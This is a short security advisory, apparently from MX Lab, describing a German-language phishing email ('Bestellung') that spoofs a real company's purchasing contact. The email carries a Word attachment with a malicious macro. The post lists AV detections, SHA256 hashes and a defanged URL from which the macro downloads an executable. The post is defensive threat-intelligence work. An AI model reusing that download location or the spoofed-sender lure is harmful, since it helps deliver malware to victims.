New Word malware: “Bestellung”


MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Bestellung”.

This email is send from the spoofed address “”Krell, Jürgen” <jkrell@berges.de>” and has the following body:

Mit freundlichen Grüßen
BERGES Antriebstechnik/Einkauf
i.A. Jürgen Krell
Leiter Einkauf

Tel: +49 2264 17-145
Fax: +49 2264 17-144
E-Mail:jkrell@berges.de
——————————————–
BERGES Antriebstechnik GmbH & Co. KG
Industriestr. 13, 51709 Marienheide
Tel.: +49 2264 17 0, Fax: +49 2264 17 125
E-Mail: info_ban@berges.de
Internet: http://www.berges.de
——————————————————————————————————
USt ID-Nr.: DE122 546 223
Handelsregister: Registergericht Köln HRA 16990
Komplementär: BERGES Antriebstechnik GmbH
Handelsregister: Registergericht Köln HRB 38484
Geschäftsführer: Dipl.-Kfm. Dietmar Sarstedt, Karl-Heinz Georg
—————————————————————————————————–

BERGES_Email_Abbinder_ISO

The attached file 13042092.doc is a Word file with malicious macro.

The malware is detected as LooksLike.Macro.Malware.gen!d3 (v), Trojan:W97M/MaliciousMacro.GEN or Macro.Trojan-Downloader.Agent.KF by 5 of the 52 AV engines at Virus Total.

Use the Virus Total or Malwr for more detailed information.
SHA256: b1a2901812c8680dce41c13e6c6b98997af0e4f9140064792cdefdee1b41e080

The macro will download more files from hxxp://simplyslim.com.sg/87tf6d45/90u7f65d.exe

The malware is detected as W32/Agent.XL.gen!Eldorado, HEUR/QVM10.1.Malware.Gen or UDS:DangerousObject.Multi.Generic by 4 of the 54 AV engines at Virus Total.

Use the Virus Total or Malwr for more detailed information.
SHA256: 932f595f1ccce5b48218613348357f190a6efc0e4931d9b40bb4f4473ff9367c

One thought on “New Word malware: “Bestellung”

Comments are closed.